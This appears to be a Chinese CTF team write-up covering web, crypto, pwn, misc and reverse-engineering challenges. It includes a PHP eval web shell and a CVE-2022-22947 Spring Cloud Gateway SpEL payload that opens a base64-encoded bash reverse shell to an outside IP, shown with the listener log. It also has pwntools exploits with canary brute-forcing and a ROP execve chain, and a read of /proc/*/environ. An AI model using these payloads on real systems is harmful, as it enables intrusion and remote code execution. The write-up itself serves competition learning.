没啥好说的，惜败

Web

unzip

L.zip

bello
/var/www/html
R.zip
bello
bello.php
<?php
eval($_REQUEST['a']);
?>
先传入L文件，在传入R文件，然后
bello.php?a=system(%27cat%20/flag%27);

dumpit

访问

?db=ctf&table_2_dump=flag1%0Aenv?db=ctf&table_2_dump=flag%0Aenv:?db=ctf&table_2_dump=flag1%0Aenv

?db=ctf&table_2_dump=flag1%0Aenv

BackendService

小明拿到了内网一个老旧服务的应用包，虽然有漏洞但是怎么利用他呢？[注意：平台题目下发后请访问/nacos路由]

审计代码发现如下

spring:
	cloud:
		nacos:
			discovery:
				server-addr: 127.0..1:8888
			config:
				name: backcfg
				file-extension: json
				group: DEFAULT_GROUP
				server-addr: 127.0.0.1:8888

nacos

https://blog.csdn.net/qq_49849300/article/details/129781776

CVE-2022-22947

https://blog.csdn.net/qq_64973687/article/details/130059155

PUT 方式访问

/nacos/v1/auth/users?accessToken=&username=nacos&newPassword=nacos

然后配置列表添加

ID:

backcfg

配置格式改成 yaml

配置内容:

{
    "spring": {
        "cloud": {
            "gateway": {
                "routes": [
                    {
                        "id": "exam",
                        "order": 0,
                        "uri": "lb://backendservice",
                        "predicates": [
                            "Path=/echo/**"
                        ],
                        "filters": [
                            {
                                "name": "AddResponseHeader",
                                "args": {
                                    "name": "result",
                                    "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNC4yMjAuMjM1LjE0OC85MDk5IDA+JjE=}|{base64,-d}|{bash,-i}\").getInputStream())).replaceAll('\n','').replaceAll('\r','')}"
                                }
                            }
                        ]
                    }
                ]
            }
        }
    }
}

[root@VM-4-9-centos ~]# nc -lvp 9099
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::9099
Ncat: Listening on 0.0.0.0:9099
Ncat: Connection from 39.106.20.178.
Ncat: Connection from 39.106.20.178:26278.
[root@engine-1 nacos]# pwd      
pwd
/home/nacos
[root@engine-1 nacos]# whoami
whoami
root
[root@engine-1 nacos]# cd /
cd /
[root@engine-1 /]# ls
ls
anaconda-post.log
bin
dev
etc
flag
home
lib
lib64
media
mnt
opt
proc
root
run
run.sh
sbin
srv
sys
tmp
usr
var
[root@engine-1 /]# cat /flag
cat /flag
flag{ecbef35d-a618-492e-8935-15f45553096a}

Crypto

基于国密SM2算法的密钥密文分发

直接按着文件给的方法操作就行
具体内容涉及个人隐私不上传了

Sign_in_passwd

变表base64

j2rXjx8yjd=YRZWyTIuwRdbyQdbqR3R9iZmsScutj2iqj3/tidj1jd=D
GHI3KLMNJOPQRSTUb%3DcdefghijklmnopWXYZ%2F12%2B406789VaqrstuvwxyzABCDEF5

在这里插入图片描述

可信计算1

非预期解法，后面被修复了

ssh连接上后进入上上级目录，ls一下有一个proc文件夹

利用通配符寻找所有路径中的环境信息：

cat /proc/*/task/*/environ

其中有flag，找到即可

Pwn

funcanary

漏洞分析：

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  __pid_t v3; // [rsp+Ch] [rbp-4h]

  sub_1243(a1, a2, a3);
  while ( 1 )
  {
    v3 = fork();
    if ( v3 < 0 )
      break;
    if ( v3 )
    {
      wait(0LL);
    }
    else
    {
      puts("welcome");
      sub_128A();
      puts("have fun");
    }
  }
  puts("fork error");
  exit(0);
}

fork：创建一个进程

wait：进程上锁

sub_128A：

unsigned __int64 sub_128A()
{
  char buf[104]; // [rsp+0h] [rbp-70h] BYREF
  unsigned __int64 v2; // [rsp+68h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  read(0, buf, 0x80uLL);
  return v2 - __readfsqword(0x28u);
}

有canary，原题：CSDN Canary学习（爆破Canary）

由此我们可以爆破canary onebyone

while len(canary) <8:
    for i in range(0,256):
        io.send(p1+canary+chr(i))
        #gdb.attach(io)
        st=io.recvuntil('welcome')
        if b"have fun" in st:
            canary+=chr(i)
            print(canary)
            break
        if i == 255:
            print("[-] Exploit failed")
            sys.exit(-1)

canary=u64(canary)
print('canary:',hex(canary))

程序是有pie的，我们直接修改下两位地址即可。

可以确定的是最后三位地址一定不会发生变化，那只需要对第四位爆破0xf位地址即可

由此可以布置栈帧

payload=b’a’*0x68+p64(canary)+p64(0xdeadbeef)+p16(x)

这里面x是0x1228+0x1000*i，即改变第四位

完整exp：

from pwn import *
context(log_level='debug',arch='amd64',os='linux')

#io=process('./funcanary')
io=remote('47.93.187.243',20227)

io.recvuntil('welcome')

p1='a'*0x68

canary='\x00'

while len(canary) <8:
    for i in range(0,256):
        io.send(p1+canary+chr(i))
        #gdb.attach(io)
        st=io.recvuntil('welcome')
        if b"have fun" in st:
            canary+=chr(i)
            print(canary)
            break
        if i == 255:
            print("[-] Exploit failed")
            sys.exit(-1)

canary=u64(canary)
print('canary:',hex(canary))

#gdb.attach(io)
for i in range(0xe):
    x=0x1228+0x1000*i
    payload=b'a'*0x68+p64(canary)+p64(0xdeadbeef)+p16(x)
    io.send(payload)
    io.recvuntil('welcome')

io.interactive()

shaokao

漏洞分析：

主要函数：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // edx
  int v4; // ecx
  int v5; // er8
  int v6; // er9
  unsigned int v8; // [rsp+Ch] [rbp-4h]

  welcome(argc, argv, envp);
  v8 = menu();
  if ( v8 <= 5 )
    __asm { jmp     rax }
  printf((unsigned int)&unk_4B7008, (_DWORD)argv, v3, v4, v5, v6);
  exit(0LL);
}

menu:

__int64 __fastcall menu(__int64 a1, __int64 a2, int a3, int a4, int a5, int a6)
{
  int v6; // edx
  int v7; // ecx
  int v8; // er8
  int v9; // er9
  unsigned int v11; // [rsp+Ch] [rbp-4h] BYREF

  printf((unsigned int)&unk_4B7040, (unsigned int)&name, a3, a4, a5, a6);
  puts("1. 啤酒");
  puts("2. 烤串");
  puts("3. 钱包余额");
  puts("4. 承包摊位");
  if ( own )
    puts("5. 改名");
  puts("0. 离开");
  putchar(62LL);
  putchar(32LL);
  _isoc99_scanf((unsigned int)&unk_4B70B3, (unsigned int)&v11, v6, v7, v8, v9);
  return v11;
}

改名函数：

__int64 gaiming()
{
  int v0; // edx
  int v1; // ecx
  int v2; // er8
  int v3; // er9
  char v5[32]; // [rsp+0h] [rbp-20h] BYREF

  puts(&unk_4B71C0);//烧烤摊儿已归你所有，请赐名：
  _isoc99_scanf((unsigned int)&unk_4B71EB, (unsignedC int)v5, v0, v1, v2, v3);
  j_strcpy_ifunc(&name, v5);
  return 0LL;
}

这个函数中，%s读取字节无上限，导致缓冲区可以溢出到返回地址，由此我们着重进入这个函数并执行rop链。

menu中，我们要进入改名函数，则必须使own为1，own为1的条件在vip中：

__int64 vip()
{
  puts("老板，你这摊儿，我买了");
  if ( money <= 100000 )
  {
    puts("没钱别瞎捣乱");
  }
  else
  {
    money -= 100000;
    own = 1;
    puts("成交");
  }
  return 0LL;
}

也就是说必须让money变成100000以上才可以承包摊位。

pijiu和chuan非常相近，只展示一个：

__int64 pijiu()
{
  int v0; // edx
  int v1; // ecx
  int v2; // er8
  int v3; // er9
  int v4; // edx
  int v5; // ecx
  int v6; // er8
  int v7; // er9
  int v9; // [rsp+8h] [rbp-8h] BYREF
  int v10; // [rsp+Ch] [rbp-4h] BYREF

  v10 = 1;
  v9 = 1;
  puts("1. 青岛啤酒");
  puts("2. 燕京U8");
  puts("3. 勇闯天涯");
  _isoc99_scanf((unsigned int)&unk_4B70B3, (unsigned int)&v10, v0, v1, v2, v3);
  puts("来几瓶？");
  _isoc99_scanf((unsigned int)&unk_4B70B3, (unsigned int)&v9, v4, v5, v6, v7);
  if ( 10 * v9 >= money )
    puts("诶哟，钱不够了");
  else
    money += -10 * v9;
  puts("咕噜咕噜...");
  returnC 0LL;
}

没有负数检查，直接减掉10*v9，那我们可以减掉一个大负数使得money大于100000。

最后直接进行一个rop链的构造：（ROPgadget）

#!/usr/bin/env python3
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = b''

p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040264f) # pop rdi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
        p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000402404) # syscall

命令:

 ROPgadget --binary ./shaokao --ropchain

完整exp：

from pwn import *
from struct import *
context(log_level='debug',arch='amd64',os='linux')

#elf=ELF('./shaokao')
#io=remote('39.105.58.194',35270)
#io=process('./shaokao')

io.recvuntil('> ')
io.sendline(b'1')
io.recvuntil('3. 勇闯天涯\n')
io.sendline(b'3')
io.recvuntil('来几瓶？')
io.sendline(b'-10000000')
io.recvuntil('> ')
io.sendline(b'4')
io.recvuntil('> ')
io.sendline(b'5')
io.recvuntil('请赐名：')

p = b'a'*0x28

p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040264f) # pop rdi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000402404) # syscall

io.sendline(p)

io.interactive()

Misc

签到卡

直接打开flag文件即可
print(open(‘/flag’).read())

pyshell

>>'print'
'print'
>>_+"(op"
'print(op'
>>_+"en("
'print(open('
>>_+"'/f"
"print(open('/f"
>>_+"lag"
"print(open('/flag"
>>_+"')."
"print(open('/flag')."
>>_+"rea"
"print(open('/flag').rea"
>>_+"d()"
"print(open('/flag').read()"
>>_+")"
"print(open('/flag').read())"
>>exec(_)
flag{40f1b2d9-572b-4006-b0ec-28fae07171fa}

国粹

没想到是散点图，往base85+词频想了，寄
a文件对应x，k文件对应y（都是341张牌），然后数值就是牌在题目中出现的顺序
按坐标排点就行

被加密的生产流量

192.168.1.130和192.168.1.164追踪TCP流

..........MM.....
..
.....)..............YW.....
..
.....)....	.........MX	....
..
.r........
.........3G
....
..
.r..................NE.....
..
.r.=...t............YW.....
..
...=...t..
.........OX
....
..
...=...t._..........ZR.....
..
........._..........GA.....
..
........._..........YD.....
..
....................A=.....
..
....................==.....

……

把同色字体连起来base32

MMYWMX3FNEYWOXZRGAYDA===

套flag{}

Re

babyRE

https://snap.berkeley.edu用题目给的网站打开文件运行
看到加密逻辑就是简单遍历异或

在这里插入图片描述

在生成密文的位置添加打印输出逻辑，获取密文
写脚本

#include<bits/stdc++.h>
using namespace std;
int main()
{
  int a[100] = {102,10,13,6,28,74,3,1,3,7,85,0,4,75,20,92,92,8,28,25,81,83,7,28,76,88,9,0,29,73,0,86,4,87,87,82,84,85,4,85,87,30};
  for(int i = 1; i < 100; i++){
    a[i] ^= a[i-1];
  }
  for(int i = 0; i < 100; i++){
    cout <<(char)a[i];
  }
  return 0;
}
//flag{12307bbf-9e91-4e61-a900-dd26a6d0ea4c}